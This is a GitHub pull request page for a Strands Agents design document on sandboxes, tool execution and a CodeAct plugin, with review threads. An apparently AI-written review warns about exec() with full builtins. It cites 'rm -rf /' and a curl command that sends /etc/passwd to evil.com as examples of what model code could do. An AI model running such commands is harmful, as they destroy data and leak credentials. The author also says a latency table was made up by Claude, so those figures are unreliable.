Skip to content

docs(designs): sandboxes and code execution#681

Open
mkmeral wants to merge 5 commits intostrands-agents:mainfrom
mkmeral:design/sandboxes-and-codeact
Open

docs(designs): sandboxes and code execution#681
mkmeral wants to merge 5 commits intostrands-agents:mainfrom
mkmeral:design/sandboxes-and-codeact

Conversation

@mkmeral
Copy link
Copy Markdown
Contributor

@mkmeral mkmeral commented Mar 18, 2026

Description

Design doc proposing three layered additions to Strands:

  1. A Sandbox abstraction (SDK-level) that decouples tool logic from execution environment. Tools delegate to tool_context.agent.sandbox instead of managing their own subprocesses and filesystem access. The agent defaults to LocalSandbox, so existing behavior is preserved. DockerSandbox and AgentCoreSandbox provide isolation for production and cloud deployments. The interface follows the minimal execute() pattern validated by LangChain DeepAgents, E2B, and Daytona.

  2. A tooling layer that updates existing tools (shell, python_repl, file_read, file_write) to use the sandbox, adds a new stateless python tool, and introduces programmatic_tool_caller — a tool that lets the model write Python code to orchestrate other tools, reducing API round-trips and keeping intermediate results out of context.

  3. A CodeActPlugin that implements the CodeAct paradigm (Apple ML Research) via Strands' hook system. Uses AfterInvocationEvent.resume for the observation loop: model generates code, plugin executes it, feeds results back as next observation. No custom agent loop needed.

The doc also covers a tool proxy design for running model-generated code fully inside the sandbox with tool calls proxied back to the host via HTTP, implemented incrementally (host-process first, proxy later).

Includes prior art survey of E2B, Daytona, LangChain DeepAgents, OpenHands, Google ADK, and Anthropic SRT.

Related Issues

Type of Change

  • New content

Checklist

  • I have read the CONTRIBUTING document
  • My changes follow the project's documentation style
  • I have tested the documentation locally using npm run dev
  • Links in the documentation are valid and working

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.

mkmeral added 3 commits March 18, 2026 16:20
Introduces a Sandbox abstraction that decouples tool logic from execution
environment, enabling tool reuse across local, Docker, and AgentCore
sandboxes. Covers three layers: Sandbox interface (SDK-level), tooling
updates including programmatic tool caller, and CodeAct plugin for
code-based tool orchestration.

Includes prior art survey of E2B, Daytona, LangChain DeepAgents,
OpenHands, Google ADK, and Anthropic SRT.
- Rename to 'Sandboxes and code execution'
- Rewrite CodeAct plugin to use AfterInvocationEvent.resume for the
  observation loop instead of wrapping the agent
- Fix programmatic tool caller to run in host process, not sandbox
- Add open questions for namespace injection, cwd persistence, and
  parallel execution with research in Appendix C
- Fix duplicate shell example, dead variable, broken appendix link
- Add python tool description
- Add tool proxy section to Layer 1 with incremental rollout plan
- Fix contradiction between programmatic tool caller steps and
  relationship to sandbox section
- Fix async exec issue in CodeAct (wrap in async main)
- Remove redundant open question 1 (now covered by tool proxy section)
- Fix import paths: sandbox implementations live in SDK
- Add sandbox isolation row to comparison table
- Wrap appendices in details/summary tags
@mkmeral mkmeral changed the title Design/sandboxes and codeact docs(designs): sandboxes and codeact Mar 18, 2026
@mkmeral mkmeral changed the title docs(designs): sandboxes and codeact docs(designs): sandboxes and code execution Mar 18, 2026
@github-actions
Copy link
Copy Markdown
Contributor

github-actions bot commented Mar 18, 2026

Documentation Preview Ready

Your documentation preview has been successfully deployed!

Preview URL: https://d3ehv1nix5p99z.cloudfront.net/pr-cms-681/docs/user-guide/quickstart/overview/

Updated at: 2026-03-19T22:10:28.182Z

@mkmeral
Copy link
Copy Markdown
Contributor Author

mkmeral commented Mar 19, 2026

Related POC branch and notebook

@agent-of-mkmeral
Copy link
Copy Markdown
Contributor

agent-of-mkmeral commented Mar 19, 2026

Initial agent review ## 🔍 Deep Review: Sandboxes & Code Execution Design + POC Branch

I've reviewed the full design document (1058 lines), the POC branch (mkmeral/sdk-python@feat/sandbox-abstraction), all implementation files, all test files, and the demo notebook. Below is a no-holds-barred analysis.


✅ What Works Well

The overall architecture is sound. Three things stand out:

  1. Option A (minimal execute()) is the right call. The prior art validates it, and the POC proves it — LocalSandbox, DockerSandbox, and AgentCoreSandbox all implement execute() cleanly, with native overrides where it matters.

  2. Agent-level sandbox (not tool-level) is correct. The shared-filesystem argument is convincing, and the implementation is clean: Agent.__init__ takes sandbox, defaults to LocalSandbox(), tools access via tool_context.agent.sandbox.

  3. Hook-based CodeAct via AfterInvocationEvent.resume is elegant. It avoids a parallel CodeActAgent class and composes with existing agent features.


🐛 Bugs in the POC Branch

Bug 1: write_file heredoc injection — content containing STRANDS_EOF breaks writes

Files: base.py:133, docker.py:249

# base.py
result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If content contains the literal string STRANDS_EOF on its own line, the heredoc terminates early, silently truncating the file or causing a shell syntax error. This is a data corruption bug — any file that happens to contain that string will be silently mangled.

Fix: Use a randomized delimiter:

import secrets
delim = f"STRANDS_EOF_{secrets.token_hex(8)}"
result = await self.execute(f"cat > '{path}' << '{delim}'\n{content}\n{delim}")

Or better yet: for LocalSandbox, just use native file I/O (which the POC already does, so base.py fallback only matters for custom sandboxes that don't override). For DockerSandbox, use docker cp with stdin piping instead of heredoc.

Bug 2: write_file path injection in base.py — unescaped single quotes in path

File: base.py:133

result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If path contains a single quote (e.g., /tmp/it's a file.txt), this produces a broken shell command. The docker.py version uses shlex.quote() (good!), but base.py does not.

Fix: Use shlex.quote(path) in base.py too (for read_file, write_file, list_files).

Bug 3: execute_code shell escaping is incomplete

File: base.py:97

escaped = code.replace("'", "'\\''") 
return await self.execute(f"{language} -c '{escaped}'", timeout=timeout)

This single-quote escaping handles the common case but breaks on code containing literal $ (variable expansion in some shells), or backticks. Multi-line code with actual newlines can also cause issues depending on the shell.

More robust approach:

import shlex
return await self.execute(f"{language} -c {shlex.quote(code)}", timeout=timeout)

Bug 4: AgentCoreSandbox is NOT imported in sandbox/__init__.py but IS re-exported from strands/__init__.py indirectly

Looking at sandbox/__init__.pyAgentCoreSandbox is correctly excluded (good). And strands/__init__.py also correctly excludes it. This is fine actually.

But DockerSandbox IS re-exported from strands/__init__.py at the top level. This means from strands import DockerSandbox works on systems without Docker. That's fine (error at runtime), but it's worth documenting clearly.

Bug 5: DockerSandbox.write_file docstring says "using docker cp" but implementation uses heredoc

File: docker.py:228

async def write_file(self, path: str, content: str) -> None:
    """Write a file into the container using docker cp."""  # <-- WRONG
    # Actually uses: cat > path << 'STRANDS_EOF'\n...\nSTRANDS_EOF

The same heredoc injection bug as Bug 1 applies here too.

Bug 6: _parse_stream_result checks isError at wrong nesting level

File: agentcore.py:147

is_error = response.get("isError", False)  # checks top-level response

But the response structure has stream[].result at the event level while isError is at the top level. Depending on the actual AgentCore API response format, isError might be per-event, not per-response. This should be validated against the real API schema.

Bug 7: LocalSandbox.write_file has a ternary expression used as statement

File: local.py:96

os.makedirs(os.path.dirname(full_path), exist_ok=True) if os.path.dirname(full_path) else None

This works but is against Python style conventions. Should be:

parent = os.path.dirname(full_path)
if parent:
    os.makedirs(parent, exist_ok=True)

🏗️ Design Issues

🚨 Issue 1 (Showstopper): The async interface doesn't match the sync SDK

The entire Sandbox ABC is async. Every method is async def. But the Strands SDK agent loop is synchronous. The @tool decorator produces sync functions. The current shell, python_repl, file_read, file_write — all sync.

The POC tools (run_command, python_tool, programmatic_tool_caller) are all async def. How do async sandbox tools get called from the synchronous agent loop?

The tests work because pytest-asyncio runs them in an event loop. But in a real Agent(tools=[run_command_tool]) call, the sync agent loop would need to asyncio.run() or loop.run_until_complete() the async tool — and if there's already a running loop (e.g., Jupyter), that creates a nested event loop problem.

This is the biggest design gap. Options:

  1. Make Sandbox have both sync and async interfaces
  2. Make the SDK's tool execution path async-aware (big SDK change)
  3. Add sync_execute() wrappers with asyncio.run() internally
  4. Make Sandbox synchronous by default with an optional async variant

I'd lean toward option 4 for the initial implementation. The design doc should address this explicitly.

🚨 Issue 2 (Showstopper): programmatic_tool_caller wrapper await bug

File: programmatic_tool_caller.py:53-57

async def wrapper(**kwargs: Any) -> Any:
    caller = getattr(agent.tool, tool_name)
    return caller(**kwargs, record_direct_tool_call=False)

The wrapper is async and the model's code does result = await calculator(expression="2+2"). But agent.tool.calculator() returns a synchronous result (a string like "4").

In the tests this works because MagicMock() return values are MagicMock objects which happen to be awaitable. With real tools, await calculator(expression="2+2") would raise TypeError: object str can't be used in 'await' expression.

Wait — actually, async def wrapper returns the value, and await wrapper() awaits the coroutine (the async function itself), not the return value. So await wrapper() works fine even if caller() returns a string. The await is on the coroutine wrapper, which resolves to the string. My mistake — this is actually correct. Disregard this specific bug.

However, there's still a subtlety: if agent.tool.X() itself is async/returns a coroutine (which could happen with sandbox-based tools), the wrapper wouldn't await it. But for Phase 1 (sync tools), this works.

Issue 3: LocalSandbox loses cd state — the design discusses it but the POC ignores it

Open Question 2 correctly identifies this. But the POC LocalSandbox uses a new subprocess per execute() call:

await sandbox.execute("cd /tmp/workspace")
await sandbox.execute("pwd")  # prints the original working_dir, NOT /tmp/workspace

The existing shell tool has CommandContext for this. Migrating shell to use sandbox breaks cd persistence. This is a regression for any tool migration.

Issue 4: programmatic_tool_caller uses exec() with full builtins

namespace: dict[str, Any] = {"__builtins__": __builtins__}

Model-generated code gets access to __import__, eval, exec, open, os, sys, etc. The model can:

  • import os; os.system('rm -rf /')
  • import subprocess; subprocess.run(['curl', 'http://evil.com', '-d', open('/etc/passwd').read()])

Phase 1 acknowledges this runs in host process, but there's no opt-in safety. Even a basic allowlist would help.

Issue 5: No streaming/real-time output support

ExecutionResult captures stdout/stderr as complete strings. For long-running commands, there's no way to stream output. The current shell tool has real-time PTY output. Migrating to Sandbox.execute() loses this.

Issue 6: Environment variable propagation is underspecified

DockerSandbox takes environment at construction time. But export FOO=bar in one execute() doesn't persist to the next (since docker exec starts a new process). The design discusses cd but not export.


📝 Design Doc Nits

  1. Layer diagram box-drawing characters may not render in all markdown contexts
  2. CodeActPlugin example references self.namespace["__stdout__"] but never sets it — needs redirect_stdout like programmatic_tool_caller
  3. "up to 98.7% token reduction" claim should be presented more cautiously with methodology context
  4. Tool proxy says "httpx must be available inside the sandbox"python:3.12-slim doesn't include httpx. Need to bootstrap dependencies
  5. CodeAct is P2 but is the most architecturally ambitious. Consider a minimal CodeAct POC as P1 to validate the resume-based approach early

🔬 POC Branch Code Quality

Overall good — clean docstrings, proper type hints, comprehensive tests:

  • ✅ 6 test files covering all components
  • ✅ Good use of mocks for Docker/AgentCore
  • ✅ The notebook is excellent for onboarding
  • ❌ Missing integration tests (all Docker/AgentCore are mocked)
  • MockSandbox and _make_tool_context duplicated across test files — needs shared conftest.py

🎯 Summary: Showstoppers vs. Nice-to-Haves

Must Fix Before Merging

  1. 🚨 Async/sync mismatch (Issue 1) — the tool layer can't work with the current sync SDK
  2. Heredoc injection (Bug 1, 5) — data corruption risk
  3. Shell escaping in base.py (Bug 2, 3) — path and code injection

Should Fix

  1. cd persistence regression (Issue 3)
  2. Security of exec() with full builtins (Issue 4)
  3. Misleading docker cp docstring (Bug 5)
  4. Ternary-as-statement style issue (Bug 7)

Nice to Have

  1. Streaming output support (Issue 5)
  2. Shared test fixtures (conftest.py)
  3. Integration tests
  4. More cautious token reduction claims

The overall vision is strong, the prior art survey is thorough, and the layered design with incremental phases is practical. The async/sync question is the key architectural decision that needs resolution before implementation proceeds.

cc @mkmeral

…eedback

- Change execute() to AsyncGenerator that yields output lines and
  final ExecutionResult, matching SDK's existing async tool streaming
- Add State management section to Layer 1 with stateless-by-default
  recommendation and rationale (concurrency safety)
- Move state discussion out of open questions into proper design section
- Explicitly address cd and export persistence in stateless model
- Update shell tool example to show streaming pattern
- Update TypeScript interface to match
Update Option A interface, tool examples, TypeScript SDK, and all three
Appendix A implementation sketches to match the actual code.

Main body:
- Replace AsyncGenerator streaming with direct ExecutionResult return
- Use shlex.quote() for shell escaping in convenience methods
- Use randomized heredoc delimiter (secrets.token_hex) in write_file
- Remove _execute_to_result() helper (not needed without streaming)
- Update tool usage examples (shell, my_tool) to use await pattern
- Update TypeScript interface to use Promise<ExecutionResult>

Appendix A — LocalSandbox:
- Add timeout error handling (proc.kill() on TimeoutError)
- Add absolute path resolution (os.path.isabs check)
- Add os.makedirs for parent directory creation in write_file
- Add class docstring

Appendix A — DockerSandbox:
- Replace ... placeholders with full implementation
- Add _run_docker helper with stdin_data support
- Add stdin pipe approach for write_file (no heredoc injection)
- Add shlex.quote for safe path handling
- Add working_dir parameter and container lifecycle
- Add timeout handling

Appendix A — AgentCoreSandbox:
- Fix import path (bedrock_agentcore.tools.code_interpreter_client)
- Add _parse_stream_result helper for response parsing
- Add list_files override with native API
- Add uuid-based default session naming
- Add stop() method
- Add proper error handling in read_file/write_file
@mkmeral mkmeral marked this pull request as ready for review March 23, 2026 16:50
|--------|-------------------------------|----------------------------|
| Methods to implement | 1 required, 4 optional overrides | 5 required |
| New provider effort | Minimal — one method gets you a working sandbox | Higher — must implement all filesystem ops |
| Filesystem quality | Shell-based by default (encoding/binary issues) | Native by default (provider controls quality) |
Copy link
Copy Markdown
Member

@lizradway lizradway Mar 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What kind of issues/what does this look like/what customer impacting limitations does this impose?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

So essentially, if you are trying to send all data (including files) over shell, you will need to base64 them, and also be extra careful about file end. For example normally, you'd have EOF tags, but now that you use shell, what if the file content has that tag? You might end up parsing something wrong

The tradeoff here is, more methods are better/safer, but single method is better DevX, and easier to understand/develop.

So we propose single method abstractions, but still provide other methods (file read/write/etc) as overwrite-able methods, so folks can achieve higher security bar.

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I comment on it elsewhere, but I'd lean on:

The tradeoff here is, more methods are better/safer

Over:

but single method is better DevX, and easier to understand/develop.

Especially given tenet:

The obvious path is the happy path

The # of people who will be implementing a Sandbox will be small I think compared to the number of users, so we want to nudge the implementation to be the right one. We can always off BaseShellSandbox for "easy devx" IMHO


The following table summarizes the planned Sandbox implementations. See [Appendix A](#appendix-a-sandbox-implementation-sketches) for code examples.

| Sandbox | Where it runs | Isolation | Latency | Use case |
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Where do these latency stats come from?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Claude made them up, honestly I didn't even check that column. I will delete it later, that doesn't really concern us in scope of this doc

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think it is definitely a statistic what would be useful to know as it will have a large net influence on high tool use conversations on Sandbox , but would be curious to see this tested rather than hallucinated lol.

│ result = await calculator(expression="2 + 2") │
│ print(result) │
└──────────────────────┬──────────────────────────────────┘
│ HTTP POST /tool/calculator
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Might be nice to have this in mermaid so it is renderable on gh.

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

technically we can. Claude decided to do it 😅

That said, diagrams are a bit more annoying in PR version, I tend to review on raw md files (maybe i should change lol)

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I tend to review on raw md files

It would help me; I do side-by-side and mermaid would be prettier :)


- `LocalSandbox` — spawns a fresh subprocess per `execute()` call. Stateless by default.
- `DockerSandbox` — each `docker exec` gets its own process. Filesystem changes persist (shared container), but cwd and env do not carry across calls.
- `AgentCoreSandbox` — session state persists natively via the AgentCore API.
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Which aspects of AgentCore are you imagining here? Which API?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

https://github.com/strands-agents/tools/blob/main/src/strands_tools/code_interpreter/agent_core_code_interpreter.py

These APIs, essentially AC creates a code interpreter instance taht we can connect and run codes on. that container itself is stateful (i'm guessing up to a certain ttl)

result = agent("Calculate the squares of numbers 1-100 and sum them")
```

The model might respond with a `programmatic_tool_caller` invocation containing:
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

just a thought -- I'm curious if this could have a twin tool that integrates with AI functions. seems fairly similar in nature.


#### How it works

1. The model receives `programmatic_tool_caller` as one of its available tools
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would the model prefer writing code that calls tools or code that uses libraries/clients. In the case below for example, the model could instead write:

print(sum(i ** 2 for i in range(1, 101)))

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think the answer is (as always) it depends. This is a application security concern. Depending on my security posture + what I want to accomplish, I might want to enable more libraries (or less).

If I want a highly secure env, but I want to use PTC (programmatic tool caller, i hate writing the long name), I can just remove all the namespace except tools, and maybe just add AC code interpreter as sandbox.

But if I am running this locally to search github to see Strands references, I will be a lot more relaxed w.r.t. what I give my agent


### P0

- [ ] Define `Sandbox` ABC and `ExecutionResult` in `sdk-python`
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

estimates/sizes?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't believe in them anymore 🙃

I already have a branch that implements this https://github.com/mkmeral/sdk-python/tree/feat/sandbox-abstraction and a notebook if you want to try it out https://github.com/mkmeral/sdk-python/blob/feat/sandbox-abstraction/notebooks/sandbox_demo.ipynb

Copy link
Copy Markdown
Member

@lizradway lizradway Mar 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

will poke around! but any estimates on date/effort to get this code from dev branch into prod? mainly asking so i can track this for context management and have this inform my roadmap dates.

wrapped = f"async def __codeact_main__():\n" + "\n".join(
f" {line}" for line in code.splitlines()
)
exec(compile(wrapped, "<codeact>", "exec"), self.namespace)
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Does it have to be limited to Python?

agent-of-mkmeral added a commit to mkmeral/tools that referenced this pull request Mar 25, 2026
Aligns programmatic_tool_caller with the sandboxes design doc
(strands-agents/docs#681) Phase 1 requirements:

- Remove Executor ABC and LocalAsyncExecutor classes
  The design doc separates Sandbox (SDK-level, where code runs) from
  the programmatic tool caller (tools-level, runs in host process).
  The Executor abstraction competed with the Sandbox design.

- Inline async execution logic directly in the tool function
  Phase 1 always runs orchestration code in-process. The ~15 lines
  of execution logic are now directly in programmatic_tool_caller().

- Use compile() for better error tracebacks
  Per the design doc: compile(code, '<programmatic_tool_caller>', 'exec')
  gives clearer tracebacks than raw exec().

- Remove custom executor documentation and examples
  The Custom Executors section in the module docstring is removed.
  The Sandbox + Tool Proxy design (Phase 2) replaces this concept.

- Remove executor-related tests
  TestExecutor class and test_custom_executor removed. Added
  test_stderr_captured and test_syntax_error_handled for coverage.

The core tool logic (tool wrappers, _execute_tool, _create_async_tool_function,
_validate_code, _get_allowed_tools) is unchanged. The tool gets simpler, not
more complex.

Refs: strands-agents/docs#681, strands-agents#387
└─────────────────────────────────────────────────┘
```

### Layer 1: Sandbox
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Let's decouple the name; Sandbox implies safety, but this is more of an Environment esp when running locally.

Not a fan of Environment directly either, but it's closer than Sandbox

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I have naming alternatives below. I think environment is too overloaded


#### Interface

The Sandbox ABC lives in the SDK (`strands-agents/sdk-python`). Concrete implementations (`LocalSandbox`, `DockerSandbox`, `AgentCoreSandbox`) also live in the SDK as vended sandbox providers, similar to how the SDK already vends tools and plugins. Third-party sandbox providers can be published as separate packages.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Concrete implementations (LocalSandbox, DockerSandbox, AgentCoreSandbox)

I'm not as convinced of this living in the SDK, esp. docker and AgentCoreSandbox, esp because of the dependencies they might include. I'm okay with us vending them, but the SDK isn't the right place

share the same Sandbox instance, giving them a common working
directory, environment variables, and filesystem.

Implementations only need to provide execute(). All other methods
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Implementations only need to provide execute(). All other methods are built on top of it.

Option 1 & Optino 2 are the same api shape, it's just that one provides a default implementation right?

I'd like to nudge implementors to implement all Sandbox fully to be more efficient; ShellBasedSandbox can be an escape hatch for those that just have a shell or don't care about optimizations, but I think the default is "Conform to this entire api"

async def write_file(self, path: str, content: str) -> None: ...

@abstractmethod
async def list_files(self, path: str = ".") -> list[str]: ...
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

3 file apis so fewer than I'd expect TBH; are we sure that's it?

https://developer.mozilla.org/en-US/docs/Web/API/File_System_API is a sandboxed implementation of a filesystem (and one we should identify as potential target for TS) to see what else we might need. The only thing I really see form there is a "get[root]Directory()"


We recommend stateless by default: each `execute()` call is independent. This avoids concurrency issues when multiple tools call the sandbox in parallel (tool A does `cd /tmp`, tool B does `cd /home` — with shared state, the last one wins and both are confused). Stateless execution is predictable and matches the LangChain DeepAgents model.

This means `cd`, `export`, and other state-modifying commands do not persist between calls. Tools that need state persistence (for example, a shell tool that tracks `cd` across calls) can manage it themselves, as the current `shell` tool already does via `CommandContext`.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

or example, a shell tool that tracks cd across calls

Have we POC'd this? I'd be curious if the shell would be able to track this given that it'd be delegating to the Sandbox for a lot more work.


#### Tool proxy

When code runs inside a sandbox (for example, the programmatic tool caller or CodeAct executing model-generated code in Docker), that code needs to call agent tools. But agent tools are Python objects in the host process — they cannot be serialized into a remote sandbox. The tool proxy solves this by bridging tool calls from the sandbox back to the host.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

that code needs to call agent tools

I wonder - do they? have we explored splitting the world in terms of "Tools that are attached to the environment, but not the agent". That would reduce a lot of complexity.

What I'm trying to tease out is: how important is tool context vs code-execution:

Strands tools have closures over the agent, access ToolContext, make API calls — they cannot be serialized as source

We recommend the callback proxy approach, implemented incrementally:

1. Phase 1 (P0/P1): orchestration code runs in the host process. Tools are local async functions. This is simple and works today.
2. Phase 2 (P2): add a tool proxy server. Orchestration code runs fully inside the sandbox. Tool calls are proxied back to the host via HTTP.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If we go forward with the concept of a tool proxy, I think the sandbox should have the concept of the proxy built in; otherwise we're delegating a lot of complexity to the caller


#### New `python` tool

A new sandbox-based `python` tool delegates to `sandbox.execute_code()`. Unlike the existing `python_repl` (which maintains a persistent namespace via `dill` serialization and supports interactive PTY), the `python` tool is stateless — each invocation runs in a fresh interpreter. This is simpler, works across all sandbox types, and is the recommended default. The existing `python_repl` tool remains available for use cases that need stateful execution.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Does it have to be python? I'm thinking that in the browser, JS is the natural choice.


#### New `python` tool

A new sandbox-based `python` tool delegates to `sandbox.execute_code()`. Unlike the existing `python_repl` (which maintains a persistent namespace via `dill` serialization and supports interactive PTY), the `python` tool is stateless — each invocation runs in a fresh interpreter. This is simpler, works across all sandbox types, and is the recommended default. The existing `python_repl` tool remains available for use cases that need stateful execution.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Did we do an analysis on other similar tools to see if they're mostly stateless? I can imagine that stateful execution would be useful for incremental development. Not a blocker though


#### Relationship to Sandbox

The programmatic tool caller does not run its code in the sandbox. It runs the model's orchestration code in the host process, injecting tool wrappers as async functions that call `agent.tool.X()`. Those tools in turn use the sandbox. The sandbox is used by the individual tools, not by the orchestration layer.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It runs the model's orchestration code in the host process

Why? This seems like we'd have two different execution patterns - why not do it in the sandbox?


#### How it works in Strands

CodeAct maps naturally to Strands' hook system. The [`AfterInvocationEvent.resume`](https://strandsagents.com/docs/user-guide/concepts/agents/hooks/index.md) property triggers a follow-up agent invocation with new input, which is exactly the CodeAct observation loop: model generates code → execute → feed results back as next observation → model generates more code.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think the state machine would be a better fit; this is effectively rewriting the agent-loop.

But implementation detail I guess

| Sandbox isolation | Phase 1: host process. Phase 2: full sandbox via tool proxy | Phase 1: host process. Phase 2: full sandbox via tool proxy |
| Use case | Optimization for batch operations | Full paradigm shift |

The programmatic tool caller is a tool the model can optionally use within standard tool calling. CodeAct changes how the agent interacts entirely — the model always writes code, and the hook system handles execution and feedback.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What have been the most common use cases for CodeAct? Coding agents?


### Layer 3: CodeAct plugin

CodeAct is a higher-level paradigm where the agent always responds with code instead of JSON tool calls. It is implemented as a hook using the existing agent lifecycle, not a modification to the agent loop.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is really interesting; how effective has it been in practice?

I'm curious of how closely the model(s) actually output code instead of text


## Open questions

1. **Namespace injection for programmatic tool calling.** The programmatic tool caller and CodeAct need tool wrapper functions in the code execution namespace. Phase 1 runs orchestration code in the host process with tools as local functions. Phase 2 uses the tool proxy to run code fully inside the sandbox. See [Tool proxy](#tool-proxy) for the full design and alternatives considered.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm missing the question here


We recommend that the `Sandbox` interface makes no concurrency guarantees. Implementations document their behavior. `LocalSandbox` can handle this by spawning subprocesses that inherit the persistent shell's tracked state (cwd, env) rather than sharing the shell process for all calls.

4. **Interactive mode.** Both `shell` and `python_repl` today support interactive PTY mode for real-time user input. This does not map cleanly to remote sandboxes (Docker, AgentCore). Our inclination is to keep interactive mode as a `LocalSandbox` concern and not complicate the abstract interface. This is not a blocker for the initial implementation and can be revisited later.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

today support interactive PTY mode for real-time user input

How does this end up surfacing to users?


| Name | Pros | Cons |
|------|------|------|
| `Sandbox` (recommended) | Clear mental model, aligns with E2B/Daytona/LangChain ecosystem terminology, implies containment | Implies isolation that `LocalSandbox` does not provide |
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ha; here's the section.

Clear mental model, aligns with... implies containment

I'm not sure this is clear. This is not a Sandbox; I feel like it's the opposite of "clear" ;). It can be a sandbox, but LocalSandbox is not clear IMHO.

Some more alternatives:

  • ExecutionRuntime
  • CodeEnvironment
  • ToolEnvironment
  • ToolExecutionEnvironment
  • ToolBackend

### P2

- [ ] Implement `CodeActPlugin`
- [ ] Add Anthropic advanced tool use support (tool search tool, tool use examples)
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This one seems like a separate workstream

- [ ] Implement `CodeActPlugin`
- [ ] Add Anthropic advanced tool use support (tool search tool, tool use examples)
- [ ] Tool proxy: implement proxy server, stub generation, and integrate with programmatic tool caller and CodeAct
- [ ] Mirror `Sandbox` interface in `sdk-typescript`
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Depending on timelines, i would expect this done much sooner. We should be doing each phase in parallel


We considered making Sandbox a tool-level concern — each tool would optionally accept a Sandbox in its constructor. This avoids SDK changes but means every tool must independently handle Sandbox injection, and there is no guarantee that tools share the same Sandbox instance.

Rejected because the shared-environment property (tools operating in the same filesystem) requires the Sandbox to be agent-level, not tool-level.
Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I was convinced that agent.sandbox should/can exist.

However this:

Rejected because the shared-environment property... requires the Sandbox to be agent-level, not tool-level.

Is a larger issue that we can address. E.g. if we wanted to limit Sandbox to not be fundamental to an agent, then we need a mechanism to store non-JSON data with an agent. E.g.

agent.services.set(Sandbox, sandbox)
sandbox = agent.services.get(Sandbox)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

6 participants